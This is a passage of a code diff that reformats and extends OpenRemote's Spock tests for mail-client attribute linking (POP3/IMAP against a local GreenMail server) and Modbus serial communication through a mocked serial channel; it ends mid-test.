+    then: "the matching linked attributes should have been updated with the new mailbox messages"
+    conditions.eventually {
+      assert attributeEvents.count {
+        it.id == asset.id && it.name == "fromMatchUseBody" && (it.value.orElse(null) as String).startsWith("Test body")
+      } == 2
+      assert attributeEvents.count {
+        it.id == asset.id && it.name == "fromMatchUseBody" && (it.value.orElse(null) as String).startsWith("Not a test body")
+      } == 1
+      assert attributeEvents.count {
+        it.id == asset.id && it.name == "fromMatchUseSubject" && (it.value.orElse(null) as String).startsWith("Test Message")
+      } == 2
+      assert attributeEvents.count {
+        it.id == asset.id && it.name == "fromMatchUseSubject" && it.value.orElse(null) == "Not A Test"
+      } == 1
+      assert attributeEvents.count {
+        it.id == asset.id && it.name == "subjectMatchUseBody" && (it.value.orElse(null) as String).startsWith("Not a test body")
+      } == 2
+      assert attributeEvents.count {
+        it.id == asset.id && it.name == "subjectAndFromMatchUseBody" && it.value.orElse(null) == "Not a test body 2"
+      } == 1
+    }
+
+    when: "more messages are received in the mailbox"
+    sendMessage("fromanother@localhost", "Really Not A Test", "Really not a test body 1")
+    sendMessage("fromanotheranother@localhost", "Not A Test", "Not a test body 3")
+
+    then: "the matching linked attributes should have been updated with the new mailbox messages"
+    conditions.eventually {
+      assert attributeEvents.count {
+        it.id == asset.id && it.name == "fromMatchUseBody" && (it.value.orElse(null) as String).startsWith("Test body")
+      } == 2
+      assert attributeEvents.count {
+        it.id == asset.id && it.name == "fromMatchUseBody" && (it.value.orElse(null) as String).startsWith("Not a test body")
+      } == 1
+      assert attributeEvents.count {
+        it.id == asset.id && it.name == "fromMatchUseSubject" && (it.value.orElse(null) as String).startsWith("Test Message")
+      } == 2
+      assert attributeEvents.count {
+        it.id == asset.id && it.name == "fromMatchUseSubject" && it.value.orElse(null) == "Not A Test"
+      } == 1
+      assert attributeEvents.count {
+        it.id == asset.id && it.name == "subjectMatchUseBody" && (it.value.orElse(null) as String).startsWith("Not a test body")
+      } == 3
+      assert attributeEvents.count {
+        it.id == asset.id && it.name == "subjectAndFromMatchUseBody" && (it.value.orElse(null) as String).startsWith("Not a test body")
+      } == 1
+    }
+
+    cleanup: "the event subscription is removed"
+    if (clientEventService != null) {
+      clientEventService.removeSubscription(eventConsumer)
+      clientEventService.removeSubscription {outdatedEventConsumer}
+    }
+    if (asset != null) {
+      assetStorageService.delete([agent.id, asset.id])
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/mail/MailClientTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/mail/MailClientTest.groovy
@@ -63,120 +63,126 @@ import java.util.concurrent.Executors
 
 class MailClientTest extends Specification implements ManagerContainerTrait {
 
-    @Shared
-    static GreenMail greenMail
-    @Shared
-    static int messageCounter
-    @Shared
-    static GreenMailUser user
+  @Shared
+  static GreenMail greenMail
+  @Shared
+  static int messageCounter
+  @Shared
+  static GreenMailUser user
 
 
-    def setupSpec() {
-        MailClientBuilder.MIN_CHECK_INTERVAL_SECONDS = 2
-        greenMail = new GreenMail(ServerSetupTest.ALL)
-        greenMail.start()
-        user = greenMail.setUser("or@localhost", "or", "secret")
+  def setupSpec() {
+    MailClientBuilder.MIN_CHECK_INTERVAL_SECONDS = 2
+    greenMail = new GreenMail(ServerSetupTest.ALL)
+    greenMail.start()
+    user = greenMail.setUser("or@localhost", "or", "secret")
+  }
+
+  def cleanupSpec() {
+    if (greenMail != null) {
+      greenMail.stop()
     }
+  }
 
-    def cleanupSpec() {
-        if (greenMail != null) {
-            greenMail.stop()
-        }
-    }
+  def sendMessage() {
+    def subject = "Test Message ${++messageCounter}"
+    def body = "Test body ${messageCounter}"
+    MimeMessage message = GreenMailUtil.createTextEmail("to@localhost", "from@localhost", subject, body, greenMail.getImap().getServerSetup())
+    message.addHeader("Test-Header", "Test Header Value")
+    user.deliver(message)
+  }
 
-    def sendMessage() {
-        def subject = "Test Message ${++messageCounter}"
-        def body = "Test body ${messageCounter}"
-        MimeMessage message = GreenMailUtil.createTextEmail("to@localhost", "from@localhost", subject, body, greenMail.getImap().getServerSetup())
-        message.addHeader("Test-Header", "Test Header Value")
-        user.deliver(message)
-    }
+  def "POP3 mail receiving test"() {
 
-    def "POP3 mail receiving test"() {
-
-        given: "an email client with callback handlers"
-        List<ConnectionStatus> connectionEvents = new CopyOnWriteArrayList<>()
-        List<MailMessage> messages = new CopyOnWriteArrayList<>()
-        def conditions = new PollingConditions(delay: 1, initialDelay: 1, timeout: 10)
-        def executor = Executors.newCachedThreadPool()
-        def scheduledExecutor = new ContainerScheduledExecutor("Test", 1)
-        def mailClient = new MailClientBuilder(
-                executor,
-                scheduledExecutor,
-                "pop3",
-                "localhost",
-                greenMail.getPop3().getServerSetup().getPort())
+    given: "an email client with callback handlers"
+    List<ConnectionStatus> connectionEvents = new CopyOnWriteArrayList<>()
+    List<MailMessage> messages = new CopyOnWriteArrayList<>()
+    def conditions = new PollingConditions(delay: 1, initialDelay: 1, timeout: 10)
+    def executor = Executors.newCachedThreadPool()
+    def scheduledExecutor = new ContainerScheduledExecutor("Test", 1)
+    def mailClient = new MailClientBuilder(
+            executor,
+            scheduledExecutor,
+            "pop3",
+            "localhost",
+            greenMail.getPop3().getServerSetup().getPort())
             .setBasicAuth("or", "secret")
             .setCheckIntervalSeconds(2)
             .setPersistenceDir(Paths.get("tmp"))
             .build()
-        mailClient.addConnectionListener{ connectionEvents.add(it)}
-        mailClient.addMessageListener{messages.add(it)}
+    mailClient.addConnectionListener{ connectionEvents.add(it)}
+    mailClient.addMessageListener{messages.add(it)}
 
-        and: "some messages in the mailbox"
-        sendMessage()
-        sendMessage()
-        sendMessage()
+    and: "some messages in the mailbox"
+    sendMessage()
+    sendMessage()
+    sendMessage()
 
-        when: "the mail client is connected"
-        mailClient.connect()
+    when: "the mail client is connected"
+    mailClient.connect()
 
-        then: "the connection status should be connected and the 3 messages should have been received"
-        conditions.eventually {
-            assert connectionEvents.any {it == ConnectionStatus.CONNECTED}
-            assert messages.size() == 3
-            assert messages.any {it.content == "Test body 1" && it.subject == "Test Message 1" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"}
-            assert messages.any {it.content == "Test body 2" && it.subject == "Test Message 2" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"}
-            assert messages.any {it.content == "Test body 3" && it.subject == "Test Message 3" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"}
-        }
+    then: "the connection status should be connected and the 3 messages should have been received"
+    conditions.eventually {
+      assert connectionEvents.any {it == ConnectionStatus.CONNECTED}
+      assert messages.size() == 3
+      assert messages.any {
+        it.content == "Test body 1" && it.subject == "Test Message 1" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"
+      }
+      assert messages.any {
+        it.content == "Test body 2" && it.subject == "Test Message 2" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"
+      }
+      assert messages.any {
+        it.content == "Test body 3" && it.subject == "Test Message 3" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"
+      }
+    }
 
-        when: "a multipart mail is sent to the mailbox with text and html parts"
-        def sendMultipartMessage = () -> {
-            def email = new MimeMessage(GreenMailUtil.getSession(greenMail.getImap().getServerSetup()))
-            email.setSubject("Test Multipart Message")
-            MimeBodyPart htmlBodyPart = new MimeBodyPart()
-            htmlBodyPart.setContent("<p>Test html body</p>", "text/html; charset=utf-8")
-            htmlBodyPart.addHeader("HTML-Header", "HTML Header Value")
-            MimeBodyPart textBodyPart = new MimeBodyPart()
-            textBodyPart.setContent("Test text body", "text/plain; charset=utf-8")
-            textBodyPart.addHeader("Text-Header", "Text Header Value")
-            Multipart multipart = new MimeMultipart("alternative")
-            multipart.addBodyPart(htmlBodyPart)
-            multipart.addBodyPart(textBodyPart)
-            email.setContent(multipart)
-            email.setRecipient(Message.RecipientType.TO, new InternetAddress("to@localhost"))
-            email.setFrom("from@localhost")
-            user.deliver(email)
-        }
-        sendMultipartMessage()
+    when: "a multipart mail is sent to the mailbox with text and html parts"
+    def sendMultipartMessage = () -> {
+      def email = new MimeMessage(GreenMailUtil.getSession(greenMail.getImap().getServerSetup()))
+      email.setSubject("Test Multipart Message")
+      MimeBodyPart htmlBodyPart = new MimeBodyPart()
+      htmlBodyPart.setContent("<p>Test html body</p>", "text/html; charset=utf-8")
+      htmlBodyPart.addHeader("HTML-Header", "HTML Header Value")
+      MimeBodyPart textBodyPart = new MimeBodyPart()
+      textBodyPart.setContent("Test text body", "text/plain; charset=utf-8")
+      textBodyPart.addHeader("Text-Header", "Text Header Value")
+      Multipart multipart = new MimeMultipart("alternative")
+      multipart.addBodyPart(htmlBodyPart)
+      multipart.addBodyPart(textBodyPart)
+      email.setContent(multipart)
+      email.setRecipient(Message.RecipientType.TO, new InternetAddress("to@localhost"))
+      email.setFrom("from@localhost")
+      user.deliver(email)
+    }
+    sendMultipartMessage()
 
-        then: "the new mail should be received with the text content"
-        conditions.eventually {
-            assert messages.size() == 4
-            def message = messages.get(messages.size()-1)
-            assert message.subject == "Test Multipart Message"
-            assert message.contentType == "text/plain; charset=utf-8"
-            assert message.content == "Test text body"
-            assert message.from[0] == "from@localhost"
-            assert message.headers.get("Text-Header").get(0) == "Text Header Value"
-            assert message.headers.get("Date") != null
-            assert message.headers.get("HTML-Header") == null
-        }
+    then: "the new mail should be received with the text content"
+    conditions.eventually {
+      assert messages.size() == 4
+      def message = messages.get(messages.size()-1)
+      assert message.subject == "Test Multipart Message"
+      assert message.contentType == "text/plain; charset=utf-8"
+      assert message.content == "Test text body"
+      assert message.from[0] == "from@localhost"
+      assert message.headers.get("Text-Header").get(0) == "Text Header Value"
+      assert message.headers.get("Date") != null
+      assert message.headers.get("HTML-Header") == null
+    }
 
-        when: "the mail client is disconnected"
-        mailClient.disconnect()
+    when: "the mail client is disconnected"
+    mailClient.disconnect()
 
-        then: "a connection event should have seen sent"
-        conditions.eventually {
-            assert connectionEvents.any {it == ConnectionStatus.DISCONNECTED}
-        }
+    then: "a connection event should have seen sent"
+    conditions.eventually {
+      assert connectionEvents.any {it == ConnectionStatus.DISCONNECTED}
+    }
 
-        when: "new mail is received"
-        sendMessage()
-        sendMessage()
+    when: "new mail is received"
+    sendMessage()
+    sendMessage()
 
-        and: "a new POP3 client is created"
-        mailClient = new MailClientBuilder(
+    and: "a new POP3 client is created"
+    mailClient = new MailClientBuilder(
             executor,
             scheduledExecutor,
             "pop3",
@@ -187,95 +193,109 @@ class MailClientTest extends Specification implements ManagerContainerTrait {
             .setPersistenceDir(Paths.get("tmp"))
             .setPreferHTML(true)
             .build()
-        mailClient.addConnectionListener{ connectionEvents.add(it)}
-        mailClient.addMessageListener{messages.add(it)}
+    mailClient.addConnectionListener{ connectionEvents.add(it)}
+    mailClient.addMessageListener{messages.add(it)}
 
-        and: "the mail client is connected"
-        messages.clear()
-        connectionEvents.clear()
-        mailClient.connect()
+    and: "the mail client is connected"
+    messages.clear()
+    connectionEvents.clear()
+    mailClient.connect()
 
-        then: "consumers should only be notified of the two new messages"
-        conditions.eventually {
-            assert connectionEvents.any {it == ConnectionStatus.CONNECTED}
-            assert messages.size() == 2
-            assert messages.any {it.content == "Test body 4" && it.subject == "Test Message 4" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"}
-            assert messages.any {it.content == "Test body 5" && it.subject == "Test Message 5" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"}
-        }
-
-        when: "another multipart mail is sent to the mailbox with text and html parts"
-        sendMultipartMessage()
-
-        then: "the new mail should be received with the text content"
-        conditions.eventually {
-            assert messages.size() == 3
-            def message = messages.get(messages.size()-1)
-            assert message.subject == "Test Multipart Message"
-            assert message.contentType == "text/html; charset=utf-8"
-            assert message.content == "<p>Test html body</p>"
-            assert message.from[0] == "from@localhost"
-            assert message.headers.get("HTML-Header").get(0) == "HTML Header Value"
-            assert message.headers.get("Date") != null
-            assert message.headers.get("Text-Header") == null
-        }
-
-        cleanup: "clean up client"
-        mailClient.disconnect()
-        greenMail.purgeEmailFromAllMailboxes()
-        messageCounter = 0
+    then: "consumers should only be notified of the two new messages"
+    conditions.eventually {
+      assert connectionEvents.any {it == ConnectionStatus.CONNECTED}
+      assert messages.size() == 2
+      assert messages.any {
+        it.content == "Test body 4" && it.subject == "Test Message 4" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"
+      }
+      assert messages.any {
+        it.content == "Test body 5" && it.subject == "Test Message 5" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"
+      }
     }
 
-    def "IMAP mail receiving test"() {
+    when: "another multipart mail is sent to the mailbox with text and html parts"
+    sendMultipartMessage()
 
-        given: "an email client with callback handlers"
-        List<ConnectionStatus> connectionEvents = new CopyOnWriteArrayList<>()
-        List<MailMessage> messages = new CopyOnWriteArrayList<>()
-        def conditions = new PollingConditions(delay: 1, initialDelay: 1, timeout: 10)
-        def executor = Executors.newCachedThreadPool()
-        def scheduledExecutor = new ContainerScheduledExecutor("Scheduled task", 1)
-        def mailClient = new MailClientBuilder(
-                executor,
-                scheduledExecutor,
-                "imap",
-                "localhost",
-                greenMail.getImap().getServerSetup().getPort())
-                .setBasicAuth("or", "secret")
-                .setCheckIntervalSeconds(2)
-                .build()
-        mailClient.addConnectionListener{ connectionEvents.add(it)}
-        mailClient.addMessageListener{messages.add(it)}
-
-        when: "3 mails are received"
-        sendMessage()
-        sendMessage()
-        sendMessage()
-
-        and: "the mail client is connected"
-        mailClient.connect()
-
-        then: "the connection status should be connected and the 3 messages should have been received"
-        conditions.eventually {
-            assert connectionEvents.any {it == ConnectionStatus.CONNECTED}
-            assert messages.size() == 3
-            assert messages.any {it.content == "Test body 1" && it.subject == "Test Message 1" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"}
-            assert messages.any {it.content == "Test body 2" && it.subject == "Test Message 2" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"}
-            assert messages.any {it.content == "Test body 3" && it.subject == "Test Message 3" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"}
-        }
-
-        when: "new mail is received"
-        sendMessage()
-        sendMessage()
-
-        then: "consumers should be notified of the two new messages"
-        conditions.eventually {
-            assert messages.size() == 5
-            assert messages.any {it.content == "Test body 4" && it.subject == "Test Message 4" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"}
-            assert messages.any {it.content == "Test body 5" && it.subject == "Test Message 5" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"}
-        }
-
-        cleanup: "clean up client"
-        mailClient.disconnect()
-        greenMail.purgeEmailFromAllMailboxes()
-        messageCounter = 0
+    then: "the new mail should be received with the text content"
+    conditions.eventually {
+      assert messages.size() == 3
+      def message = messages.get(messages.size()-1)
+      assert message.subject == "Test Multipart Message"
+      assert message.contentType == "text/html; charset=utf-8"
+      assert message.content == "<p>Test html body</p>"
+      assert message.from[0] == "from@localhost"
+      assert message.headers.get("HTML-Header").get(0) == "HTML Header Value"
+      assert message.headers.get("Date") != null
+      assert message.headers.get("Text-Header") == null
     }
+
+    cleanup: "clean up client"
+    mailClient.disconnect()
+    greenMail.purgeEmailFromAllMailboxes()
+    messageCounter = 0
+  }
+
+  def "IMAP mail receiving test"() {
+
+    given: "an email client with callback handlers"
+    List<ConnectionStatus> connectionEvents = new CopyOnWriteArrayList<>()
+    List<MailMessage> messages = new CopyOnWriteArrayList<>()
+    def conditions = new PollingConditions(delay: 1, initialDelay: 1, timeout: 10)
+    def executor = Executors.newCachedThreadPool()
+    def scheduledExecutor = new ContainerScheduledExecutor("Scheduled task", 1)
+    def mailClient = new MailClientBuilder(
+            executor,
+            scheduledExecutor,
+            "imap",
+            "localhost",
+            greenMail.getImap().getServerSetup().getPort())
+            .setBasicAuth("or", "secret")
+            .setCheckIntervalSeconds(2)
+            .build()
+    mailClient.addConnectionListener{ connectionEvents.add(it)}
+    mailClient.addMessageListener{messages.add(it)}
+
+    when: "3 mails are received"
+    sendMessage()
+    sendMessage()
+    sendMessage()
+
+    and: "the mail client is connected"
+    mailClient.connect()
+
+    then: "the connection status should be connected and the 3 messages should have been received"
+    conditions.eventually {
+      assert connectionEvents.any {it == ConnectionStatus.CONNECTED}
+      assert messages.size() == 3
+      assert messages.any {
+        it.content == "Test body 1" && it.subject == "Test Message 1" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"
+      }
+      assert messages.any {
+        it.content == "Test body 2" && it.subject == "Test Message 2" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"
+      }
+      assert messages.any {
+        it.content == "Test body 3" && it.subject == "Test Message 3" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"
+      }
+    }
+
+    when: "new mail is received"
+    sendMessage()
+    sendMessage()
+
+    then: "consumers should be notified of the two new messages"
+    conditions.eventually {
+      assert messages.size() == 5
+      assert messages.any {
+        it.content == "Test body 4" && it.subject == "Test Message 4" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"
+      }
+      assert messages.any {
+        it.content == "Test body 5" && it.subject == "Test Message 5" && it.sentDate != null && it.contentType == "text/plain; charset=us-ascii" && it.from[0] == "from@localhost" && it.headers.get("Test-Header").get(0) == "Test Header Value"
+      }
+    }
+
+    cleanup: "clean up client"
+    mailClient.disconnect()
+    greenMail.purgeEmailFromAllMailboxes()
+    messageCounter = 0
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/modbus/ModbusSerialTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/modbus/ModbusSerialTest.groovy
@@ -55,1031 +55,1054 @@ import static org.openremote.model.value.MetaItemType.STORE_DATA_POINTS
 @spock.lang.Retry(count = 5)
 class ModbusSerialTest extends Specification implements ManagerContainerTrait {
 
-    static byte[] latestRequest = null
-    static byte[] latestWriteRequest = null
-    static ByteArrayOutputStream frameBuffer = new ByteArrayOutputStream()
+  static byte[] latestRequest = null
+  static byte[] latestWriteRequest = null
+  static ByteArrayOutputStream frameBuffer = new ByteArrayOutputStream()
 
-    def setupSpec() {
-        // retransform SerialIOClient.getChannelClass() to return MockSerialChannel instead of JSerialCommChannel
-        def instrumentation = ByteBuddyAgent.install()
-        new AgentBuilder.Default()
+  def setupSpec() {
+    // retransform SerialIOClient.getChannelClass() to return MockSerialChannel instead of JSerialCommChannel
+    def instrumentation = ByteBuddyAgent.install()
+    new AgentBuilder.Default()
             .disableClassFormatChanges()
             .with(AgentBuilder.RedefinitionStrategy.RETRANSFORMATION)
             .type(ElementMatchers.is(SerialIOClient.class))
             .transform { builder, typeDescription, classLoader, module, protectionDomain ->
-                builder.visit(Advice.to(MockSerialChannel.GetChannelClassAdvice.class)
-                    .on(ElementMatchers.named("getChannelClass")))
+              builder.visit(Advice.to(MockSerialChannel.GetChannelClassAdvice.class)
+              .on(ElementMatchers.named("getChannelClass")))
             }
             .installOn(instrumentation)
 
-        instrumentation.retransformClasses(SerialIOClient.class)
+    instrumentation.retransformClasses(SerialIOClient.class)
 
-        // Set up mock serial channel to handle Modbus RTU frames
-        MockSerialChannel.setDataHandler { byte[] data, MockSerialChannel.ResponseCallback responseCallback ->
-            synchronized (frameBuffer) {
-                frameBuffer.write(data, 0, data.length)
-                byte[] buffer = frameBuffer.toByteArray()
+    // Set up mock serial channel to handle Modbus RTU frames
+    MockSerialChannel.setDataHandler { byte[] data, MockSerialChannel.ResponseCallback responseCallback ->
+      synchronized (frameBuffer) {
+        frameBuffer.write(data, 0, data.length)
+        byte[] buffer = frameBuffer.toByteArray()
 
-                if (buffer.length >= 8) {
-                    latestRequest = buffer.clone()
+        if (buffer.length >= 8) {
+          latestRequest = buffer.clone()
 
-                    // Check if it's a write request
-                    int functionCode = buffer[1] & 0xFF
-                    if (functionCode == 0x05 || functionCode == 0x06 ||
-                        functionCode == 0x0F || functionCode == 0x10) {
-                        latestWriteRequest = buffer.clone()
+          // Check if it's a write request
+          int functionCode = buffer[1] & 0xFF
+          if (functionCode == 0x05 || functionCode == 0x06 ||
+                  functionCode == 0x0F || functionCode == 0x10) {
+            latestWriteRequest = buffer.clone()
+          }
+
+          // Generate and send response
+          byte[] response = generateModbusResponse(buffer, 0, buffer.length)
+          if (response != null && response.length> 0) {
+            responseCallback.sendResponse(response)
+          }
+
+          frameBuffer.reset()
+        }
+      }
+    }
+  }
+
+  def cleanupSpec() {
+    MockSerialChannel.setDataHandler(null)
+  }
+
+  def setup() {
+    // Reset mock state before each test
+    latestRequest = null
+    latestWriteRequest = null
+    synchronized (frameBuffer) {
+      frameBuffer.reset()
+    }
+  }
+
+  def "Modbus Serial Integration Test - Basic Operations"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 30, delay: 0.5)
+
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
+
+    and: "a Modbus Serial agent is created"
+    def agent = new ModbusSerialAgent("Modbus RTU Device")
+    agent.setRealm(MASTER_REALM)
+    agent.addOrReplaceAttributes(
+            new Attribute<>(ModbusSerialAgent.SERIAL_PORT, "/dev/ttyUSB0"),
+            new Attribute<>(ModbusSerialAgent.BAUD_RATE, 9600),
+            new Attribute<>(ModbusSerialAgent.DATA_BITS, 8),
+            new Attribute<>(ModbusSerialAgent.STOP_BITS, Stopbits.STOPBITS_1),
+            new Attribute<>(ModbusSerialAgent.PARITY, Paritybit.EVEN),
+            new Attribute<>(ModbusAgent.DEVICE_CONFIG, [
+              "default": new ModbusAgent.ModbusDeviceConfig(ModbusAgent.EndianFormat.BIG_ENDIAN, "101,151-161", 30)
+            ] as ModbusAgent.DeviceConfigMap)
+            )
+
+    agent = assetStorageService.merge(agent)
+
+    then: "the protocol instance should be created"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) != null
+      assert agentService.getProtocolInstance(agent.id) instanceof ModbusSerialProtocol
+    }
+
+    and: "the connection status should be CONNECTED"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.getId())
+      agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
+    }
+
+    when: "a device with partial read configuration is created (missing readValueType)"
+    def device0 = new ThingAsset("Partial Config Device")
+    device0.setRealm(MASTER_REALM)
+    device0.addOrReplaceAttributes(
+            // Partial read config - has readMemoryArea and readAddress but missing readValueType
+            new Attribute<>("partialReadConfig", ValueType.INTEGER).addOrReplaceMeta(new MetaItem<>(
+                    AGENT_LINK,
+                    new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadAddress(50)
+                      // Missing: readValueType
                     }
+                    ))
+            )
+    device0 = assetStorageService.merge(device0)
 
-                    // Generate and send response
-                    byte[] response = generateModbusResponse(buffer, 0, buffer.length)
-                    if (response != null && response.length > 0) {
-                        responseCallback.sendResponse(response)
+    then: "the attribute should be linked without creating read polling tasks"
+    conditions.eventually {
+      def protocol = agentService.getProtocolInstance(agent.id) as ModbusSerialProtocol
+      assert protocol != null
+      // No batch groups should be created for incomplete read config
+      assert protocol.batchGroups.isEmpty()
+    }
+
+    when: "the partial config device is removed"
+    assetStorageService.delete([device0.getId()])
+
+    and: "we wait for cleanup to complete"
+    Thread.sleep(500)
+
+    and: "A Thing asset is created with multiple agent links"
+    ThingAsset device = new ThingAsset("Test Modbus Device")
+    device.setRealm(MASTER_REALM)
+
+    // Add various data type attributes
+    device.addOrReplaceAttributes(
+            // UINT16 register
+            new Attribute<>("register1", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(new MetaItem<>(
+                    AGENT_LINK,
+                    new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
+                      it.setReadAddress(1)
+                      it.setRegistersAmount(1)
                     }
+                    )),
+            // UINT16 register
+            new Attribute<>("register2", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(new MetaItem<>(
+                    AGENT_LINK,
+                    new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
+                      it.setReadAddress(3)
+                      it.setRegistersAmount(1)
+                    }
+                    )),
+            // Float (REAL) value
+            new Attribute<>("temperature", ValueType.NUMBER).addOrReplaceMeta(new MetaItem<>(
+                    AGENT_LINK,
+                    new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.INPUT)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.REAL)
+                      it.setReadAddress(201)
+                      it.setRegistersAmount(2)
+                    }
+                    )),
+            // Coil
+            new Attribute<>("switch1", ValueType.BOOLEAN).addOrReplaceMeta(new MetaItem<>(
+                    AGENT_LINK,
+                    new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.COIL)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.BOOL)
+                      it.setReadAddress(6)
+                      it.setWriteMemoryArea(ModbusAgentLink.WriteMemoryArea.COIL)
+                      it.setWriteAddress(6)
+                    }
+                    ))
+            )
 
-                    frameBuffer.reset()
-                }
-            }
-        }
+    device = assetStorageService.merge(device)
+
+    then: "register batches should be created and attributes should receive values"
+    conditions.eventually {
+      def protocol = agentService.getProtocolInstance(agent.id) as ModbusSerialProtocol
+      assert protocol != null
+
+      // Check that batch groups were created
+      assert protocol.batchGroups.size() > 0
+
+      device = assetStorageService.find(device.getId(), true)
+
+      // Verify values were read
+      assert device.getAttribute("register1").flatMap { it.getValue() }.isPresent()
+      assert device.getAttribute("register2").flatMap { it.getValue() }.isPresent()
+      assert device.getAttribute("temperature").flatMap { it.getValue() }.isPresent()
+      assert device.getAttribute("switch1").flatMap { it.getValue() }.isPresent()
+
+      // Check float value (should be 23.5 from mock)
+      assert Math.abs((device.getAttribute("temperature").flatMap {
+        it.getValue()
+      }.get() as Double) - 23.5) < 0.1
     }
 
-    def cleanupSpec() {
-        MockSerialChannel.setDataHandler(null)
+    when: "a write operation is performed"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(device.getId(), "switch1", true))
+
+    then: "the write should be sent to the device"
+    conditions.eventually {
+      def lastWriteRequest = latestWriteRequest
+      assert lastWriteRequest != null
+      assert lastWriteRequest[0] == (byte) 1 // Unit ID
+      assert lastWriteRequest[1] == (byte) 0x05 // Write single coil function
+    }
+  }
+
+  def "Modbus Serial Test - Batching with Illegal Registers"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.5)
+
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
+
+    and: "a Modbus Serial agent with illegal registers is created"
+    def agent = new ModbusSerialAgent("Modbus RTU with Illegal Regs")
+    agent.setRealm(MASTER_REALM)
+    agent.addOrReplaceAttributes(
+            new Attribute<>(ModbusSerialAgent.SERIAL_PORT, "/dev/ttyUSB0"),
+            new Attribute<>(ModbusSerialAgent.BAUD_RATE, 9600),
+            new Attribute<>(ModbusSerialAgent.DATA_BITS, 8),
+            new Attribute<>(ModbusSerialAgent.STOP_BITS, Stopbits.STOPBITS_1),
+            new Attribute<>(ModbusSerialAgent.PARITY, Paritybit.EVEN),
+            new Attribute<>(ModbusAgent.DEVICE_CONFIG, [
+              "default": new ModbusAgent.ModbusDeviceConfig(ModbusAgent.EndianFormat.BIG_ENDIAN, "6-11,21-26", 30)
+            ] as ModbusAgent.DeviceConfigMap)
+            )
+
+    agent = assetStorageService.merge(agent)
+
+    and: "attributes are created that would span illegal register ranges"
